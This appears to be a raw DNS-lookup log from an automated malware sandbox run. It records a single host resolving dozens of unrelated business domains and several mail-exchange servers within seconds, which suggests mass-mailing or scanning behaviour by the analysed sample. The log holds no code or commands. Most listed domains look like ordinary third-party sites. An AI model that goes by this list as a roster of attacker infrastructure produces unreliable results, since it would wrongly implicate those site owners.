                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:02.015710115 CET8.8.8.8192.168.2.50x562No error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:02.062458992 CET8.8.8.8192.168.2.50x1296Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:02.157380104 CET8.8.8.8192.168.2.50xb8d6No error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:02.157380104 CET8.8.8.8192.168.2.50xb8d6No error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:02.339396954 CET8.8.8.8192.168.2.50xa326No error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:02.339396954 CET8.8.8.8192.168.2.50xa326No error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:02.869827032 CET8.8.8.8192.168.2.50x9c57No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:02.869827032 CET8.8.8.8192.168.2.50x9c57No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:02.928914070 CET8.8.8.8192.168.2.50xe62cNo error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:03.056376934 CET8.8.8.8192.168.2.50x8180Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:03.526135921 CET8.8.8.8192.168.2.50x28No error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:03.526135921 CET8.8.8.8192.168.2.50x28No error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:03.775068045 CET8.8.8.8192.168.2.50x448eNo error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:04.117820024 CET8.8.8.8192.168.2.50x9f6bName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:04.227833986 CET8.8.8.8192.168.2.50x7de2No error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:04.383115053 CET8.8.8.8192.168.2.50x9189No error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:04.892518044 CET8.8.8.8192.168.2.50x9029No error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:04.892518044 CET8.8.8.8192.168.2.50x9029No error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:05.291953087 CET8.8.8.8192.168.2.50x5f07No error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:05.485883951 CET8.8.8.8192.168.2.50x9660No error (0)www.x0c.com185.53.177.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:05.543407917 CET8.8.8.8192.168.2.50x7c74Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:05.724833965 CET8.8.8.8192.168.2.50xff94Name error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:06.339685917 CET8.8.8.8192.168.2.50xd92eName error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:06.920558929 CET8.8.8.8192.168.2.50x91c5Name error (3)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:08.299709082 CET8.8.8.8192.168.2.50x1f75No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:09.283288002 CET8.8.8.8192.168.2.50xff3dNo error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:09.355811119 CET8.8.8.8192.168.2.50x8198No error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:09.363353968 CET8.8.8.8192.168.2.50xea3aName error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:09.372734070 CET8.8.8.8192.168.2.50xd9b7No error (0)www.tyrns.com62.75.216.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:10.079336882 CET8.8.8.8192.168.2.50xfad1No error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:10.277365923 CET8.8.8.8192.168.2.50xbcf9No error (0)www.tc17.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:10.277365923 CET8.8.8.8192.168.2.50xbcf9No error (0)www.tc17.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:10.866060972 CET8.8.8.8192.168.2.50xe705No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:10.951620102 CET8.8.8.8192.168.2.50x1ed1No error (0)www.railbook.net81.171.22.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:11.530921936 CET8.8.8.8192.168.2.50x8fc8No error (0)www.fnsds.orgcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:11.530921936 CET8.8.8.8192.168.2.50x8fc8No error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:11.530921936 CET8.8.8.8192.168.2.50x8fc8No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.237.200.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:11.530921936 CET8.8.8.8192.168.2.50x8fc8No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.236.92.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:12.050789118 CET8.8.8.8192.168.2.50x7930No error (0)www.pohlfood.compohlfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:12.050789118 CET8.8.8.8192.168.2.50x7930No error (0)pohlfood.com104.218.10.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:13.368025064 CET8.8.8.8192.168.2.50xd6a8No error (0)gmail-smtp-in.l.google.com142.251.31.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:13.672785044 CET8.8.8.8192.168.2.50x415bNo error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:16.283302069 CET8.8.8.8192.168.2.50x1ee2No error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:16.283302069 CET8.8.8.8192.168.2.50x1ee2No error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:16.788959026 CET8.8.8.8192.168.2.50x45f2No error (0)gmail-smtp-in.l.google.com142.251.31.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:17.616628885 CET8.8.8.8192.168.2.50xad03No error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:18.506212950 CET8.8.8.8192.168.2.50x5c33No error (0)smtp.sbcglobal.yahoo.comsmtp-sbc.mail.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:18.506212950 CET8.8.8.8192.168.2.50x5c33No error (0)smtp-sbc.mail.yahoo.comsmtp1.sbc.mail.am0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:18.506212950 CET8.8.8.8192.168.2.50x5c33No error (0)smtp1.sbc.mail.am0.yahoodns.net67.195.12.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:18.506212950 CET8.8.8.8192.168.2.50x5c33No error (0)smtp1.sbc.mail.am0.yahoodns.net66.163.170.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:18.506212950 CET8.8.8.8192.168.2.50x5c33No error (0)smtp1.sbc.mail.am0.yahoodns.net66.218.88.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:19.342873096 CET8.8.8.8192.168.2.50x4e2bNo error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:19.342873096 CET8.8.8.8192.168.2.50x4e2bNo error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:19.348887920 CET8.8.8.8192.168.2.50xce10Name error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:19.359672070 CET8.8.8.8192.168.2.50x75d6Server failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:20.851241112 CET8.8.8.8192.168.2.50x52aaName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:21.613792896 CET8.8.8.8192.168.2.50xf62dNo error (0)gmail-smtp-in.l.google.com172.217.218.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:21.864568949 CET8.8.8.8192.168.2.50xa268Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:21.885026932 CET8.8.8.8192.168.2.50x9e65No error (0)mail.protonmail.ch185.205.70.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:21.885026932 CET8.8.8.8192.168.2.50x9e65No error (0)mail.protonmail.ch176.119.200.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:21.885026932 CET8.8.8.8192.168.2.50x9e65No error (0)mail.protonmail.ch185.70.42.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:22.495963097 CET8.8.8.8192.168.2.50x9b9eNo error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:22.495963097 CET8.8.8.8192.168.2.50x9b9eNo error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:24.370589972 CET8.8.8.8192.168.2.50xef1No error (0)www.fnsds.orgcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:24.370589972 CET8.8.8.8192.168.2.50xef1No error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:24.370589972 CET8.8.8.8192.168.2.50xef1No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.236.92.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:24.370589972 CET8.8.8.8192.168.2.50xef1No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.237.200.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:24.710812092 CET8.8.8.8192.168.2.50x31a8No error (0)akdeniz.nl109.71.54.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:24.724549055 CET8.8.8.8192.168.2.50x9f95No error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:24.724549055 CET8.8.8.8192.168.2.50x9f95No error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:24.735888958 CET8.8.8.8192.168.2.50x338bNo error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:24.735888958 CET8.8.8.8192.168.2.50x338bNo error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:24.815392971 CET8.8.8.8192.168.2.50x8f96No error (0)shenhgts.net199.59.243.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:24.935444117 CET8.8.8.8192.168.2.50x9940No error (0)k-nikko.com18.177.67.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:24.947844982 CET8.8.8.8192.168.2.50xe1daNo error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.015328884 CET8.8.8.8192.168.2.50xf942No error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.139085054 CET8.8.8.8192.168.2.50xe80No error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.139085054 CET8.8.8.8192.168.2.50xe80No error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.139110088 CET8.8.8.8192.168.2.50x3820Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.158940077 CET8.8.8.8192.168.2.50xd043No error (0)karila.fr89.107.169.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.175029993 CET8.8.8.8192.168.2.50x5d41No error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.175029993 CET8.8.8.8192.168.2.50x5d41No error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.183512926 CET8.8.8.8192.168.2.50xe6e5No error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.183512926 CET8.8.8.8192.168.2.50xe6e5No error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.188740015 CET8.8.8.8192.168.2.50x79ddName error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.197556973 CET8.8.8.8192.168.2.50xcba3No error (0)diamir.de138.201.65.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.223831892 CET8.8.8.8192.168.2.50xc63bNo error (0)alt4.gmail-smtp-in.l.google.com173.194.202.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.229708910 CET8.8.8.8192.168.2.50x7d02Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.259573936 CET8.8.8.8192.168.2.50xee96No error (0)gmail-smtp-in.l.google.com142.251.31.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.281101942 CET8.8.8.8192.168.2.50x23e9No error (0)usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.298213959 CET8.8.8.8192.168.2.50x6aeaNo error (0)muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.320636034 CET8.8.8.8192.168.2.50x34fNo error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.331629038 CET8.8.8.8192.168.2.50xe002No error (0)in1.smtp.messagingengine.com66.111.4.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.331629038 CET8.8.8.8192.168.2.50xe002No error (0)in1.smtp.messagingengine.com66.111.4.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.331629038 CET8.8.8.8192.168.2.50xe002No error (0)in1.smtp.messagingengine.com66.111.4.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.331629038 CET8.8.8.8192.168.2.50xe002No error (0)in1.smtp.messagingengine.com66.111.4.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.331629038 CET8.8.8.8192.168.2.50xe002No error (0)in1.smtp.messagingengine.com66.111.4.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.331629038 CET8.8.8.8192.168.2.50xe002No error (0)in1.smtp.messagingengine.com66.111.4.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.365699053 CET8.8.8.8192.168.2.50x567aNo error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.390744925 CET8.8.8.8192.168.2.50x461dNo error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.479252100 CET8.8.8.8192.168.2.50x52f6No error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.487256050 CET8.8.8.8192.168.2.50xbb4bNo error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.540085077 CET8.8.8.8192.168.2.50x4cd5No error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.587896109 CET8.8.8.8192.168.2.50xf5eName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.598035097 CET8.8.8.8192.168.2.50xf89aNo error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.598035097 CET8.8.8.8192.168.2.50xf89aNo error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.599761009 CET8.8.8.8192.168.2.50x67a1No error (0)www.muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.685653925 CET8.8.8.8192.168.2.50x90caNo error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.686588049 CET8.8.8.8192.168.2.50x24a9No error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.686588049 CET8.8.8.8192.168.2.50x24a9No error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.686588049 CET8.8.8.8192.168.2.50x24a9No error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.694385052 CET8.8.8.8192.168.2.50x6775No error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.716283083 CET8.8.8.8192.168.2.50x8788Name error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.778603077 CET8.8.8.8192.168.2.50x2e72No error (0)revoldia.net185.244.106.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.783853054 CET8.8.8.8192.168.2.50xf5eName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.822391033 CET8.8.8.8192.168.2.50x30aaNo error (0)orlyhotel.com172.67.156.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.822391033 CET8.8.8.8192.168.2.50x30aaNo error (0)orlyhotel.com104.21.48.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.846321106 CET8.8.8.8192.168.2.50x54fbNo error (0)dhh.la.gov52.200.51.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.878139019 CET8.8.8.8192.168.2.50x9a9cNo error (0)yhsll.com154.88.50.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.890530109 CET8.8.8.8192.168.2.50x31e4No error (0)webavant.com148.72.176.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.895220041 CET8.8.8.8192.168.2.50x6b38No error (0)cpmteam.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.895220041 CET8.8.8.8192.168.2.50x6b38No error (0)cpmteam.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.910382032 CET8.8.8.8192.168.2.50xade8No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.910382032 CET8.8.8.8192.168.2.50xade8No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.922157049 CET8.8.8.8192.168.2.50x5b28No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.922157049 CET8.8.8.8192.168.2.50x5b28No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.932641983 CET8.8.8.8192.168.2.50xe18eNo error (0)cjcagent.com157.112.187.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.973157883 CET8.8.8.8192.168.2.50x7decNo error (0)sinwal.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.973157883 CET8.8.8.8192.168.2.50x7decNo error (0)sinwal.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.007214069 CET8.8.8.8192.168.2.50xa532No error (0)ifesnet.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.007214069 CET8.8.8.8192.168.2.50xa532No error (0)ifesnet.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.038045883 CET8.8.8.8192.168.2.50xbd64No error (0)www.diamir.de138.201.65.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.044064999 CET8.8.8.8192.168.2.50xe878No error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.044064999 CET8.8.8.8192.168.2.50xe878No error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.045891047 CET8.8.8.8192.168.2.50xb668No error (0)sigtoa.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.045891047 CET8.8.8.8192.168.2.50xb668No error (0)sigtoa.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.062839985 CET8.8.8.8192.168.2.50xb8e6No error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.062875986 CET8.8.8.8192.168.2.50xc17aNo error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.084767103 CET8.8.8.8192.168.2.50x660eNo error (0)insia.com82.208.6.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.107492924 CET8.8.8.8192.168.2.50x4538No error (0)www.pohlfood.compohlfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.107492924 CET8.8.8.8192.168.2.50x4538No error (0)pohlfood.com104.218.10.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.217813969 CET8.8.8.8192.168.2.50x43cdNo error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.218977928 CET8.8.8.8192.168.2.50x7cd9No error (0)eos-i.commacx1980.qy56.supcname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.218977928 CET8.8.8.8192.168.2.50x7cd9No error (0)macx1980.qy56.supcname.commfddos.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.218977928 CET8.8.8.8192.168.2.50x7cd9No error (0)mfddos.datacname.com15.204.18.132.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.218977928 CET8.8.8.8192.168.2.50x7cd9No error (0)15.204.18.132.datacname.com15.204.18.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.285487890 CET8.8.8.8192.168.2.50xd641No error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.372417927 CET8.8.8.8192.168.2.50xfe45Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.490020037 CET8.8.8.8192.168.2.50x35bbNo error (0)gcss.com35.186.238.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.560321093 CET8.8.8.8192.168.2.50x7d79Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.592573881 CET8.8.8.8192.168.2.50xd1fNo error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.592573881 CET8.8.8.8192.168.2.50xd1fNo error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.604624033 CET8.8.8.8192.168.2.50x6e4dNo error (0)workplus.hu188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.604624033 CET8.8.8.8192.168.2.50x6e4dNo error (0)workplus.hu188.114.96.3A (IP address)IN (0x0001)false
